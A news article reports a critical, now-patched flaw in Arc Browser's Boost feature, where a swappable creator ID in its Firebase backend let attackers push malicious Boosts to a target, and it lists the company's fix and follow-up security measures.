One of the features that differentiates Arc Browser from other browsers is its ability to customize websites. Called “Boost,” the feature allows users to change the background color of a website, switch to a more preferred or readable font, or even remove unwanted elements from the page entirely. The changes you make aren’t supposed to be visible to others, but can be shared across devices. Now, the Browser Company, creators of Arc, have acknowledged that security researchers have found a critical flaw that could allow attackers to use Boost to compromise a target’s system.
The company used Firebase, which the security researcher known as “xyzeva” described in his vulnerability post as a “database as a backend service” to support some of the Arc features. In particular, for Boosts, it’s used to share and sync customizations across devices. In xyzeva’s post, he showed how the browser can load Boosts onto a device using the creator’s identity (creatorID). He also showed how to change that element to the target’s identity tag and assign the Boosts you create to that target.
For example, if a bad actor creates a boost containing a malicious payload, they can simply change their own creator ID to that of the intended target. Then, when the intended victim visits a website with Arc, they could unknowingly download the hacker’s malware. And as the researchers explained, it’s very easy to obtain a browser’s user ID. A user who refers someone to Arc will share their ID with the recipient, and if the account was created from a referral, the referrer will also get their ID. Users can also share their boosts with others. Arc has a page of public boosts that includes the creator ID of the person who created the boost.
In a post, the browser company said it was notified of the security issue by xyzeva on August 25 and released a fix the next day with the help of the researcher. It also assured users that no one had exploited the vulnerability and no users were affected. The company has also implemented several security measures to prevent a similar situation, including migrating away from Firebase, disabling JavaScript by default in synced Boosts, establishing a bug bounty program, and hiring a new senior security engineer.
